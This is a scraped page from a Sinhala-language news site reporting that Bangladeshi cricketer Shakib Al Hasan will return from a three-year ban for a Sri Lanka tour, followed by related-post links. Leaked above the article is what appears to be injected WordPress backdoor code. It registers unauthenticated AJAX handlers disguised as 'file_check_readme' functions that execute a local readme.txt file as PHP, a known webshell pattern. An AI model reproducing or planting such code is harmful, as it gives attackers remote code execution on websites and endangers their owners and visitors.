if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } වසර 03ක් තරග තහනමක සිටි ශකීබ් ලංකාවෙන් වැඩ අරඹන්න යයි - mediahumanrights.lk
mediahumanrights.lk
News Sports Sports News

වසර 03ක් තරග තහනමක සිටි ශකීබ් ලංකාවෙන් වැඩ අරඹන්න යයි

වසර 3ක තරග තහනමකට ලක්ව සිටි බංග්ලාදේශ කණ්ඩායමේ හිටපු නායක ශකීබ් අල්හසන්ට මෙවර ශ‍්‍රී ලංකා තරග සංචාරය සදහා එක්වීමට අවස්ථාව උදාවී තිබෙනවා.

ජාත්‍යන්තර ක‍්‍රිකට් කවුන්සිලයේ නිති උල්ලංගණය කිරීමෙන් ශකීබ් අල් හසන්ට වසර 3ක තරග තහනමක් පැනවීම සිදු වූයේ 2017 වසරේදියි.

ඔහුට පැන වූ තරග තහනම ලබන ඔක්තෝබර් මස 29 වැනිදා අවසන් වීමට නියමිත බව බංග්ලාදේශ ක‍්‍රිකට් පාලක මණ්ඩලය සදහන් කළා.

ශකීබ් අල් හසන් මේ වනවිට සිය පුහුණුවීම්ද ආරම්භ කර තිබෙනවා. ශ‍්‍රී ලංකාව සහ බංග්ලාදේශ කණ්ඩායම අතර ටෙස්ට් තරග 3ක් ලබන සැප්තැම්ර් මාසයේදී පැවැත්වීමටයි දැනට සැලසුම් කර ඇත්තේ.
(under the courtesy of nethnews.lk news web)

Related posts

සිදු වූ දේ ඇමති දයාසිරිගේ හෘද සාක්‍ෂිය දන්නවා..- රිටිගල වෙද මහතා කියයි..

Shiran Viraj

චන්ද‍්‍රිකා යලි පිටියට එයි.. විපක්‍ෂ හා ස්වාධීන මන්ත‍්‍රින් සමග රහස් සාකච්චා.. ආණ්ඩුව පෙරලන්න සැරසේ..

Shiran Viraj

ආබාධිත රණවිරුවන් මරාන්තික උපවාසයකට සුදානම්

Shiran Viraj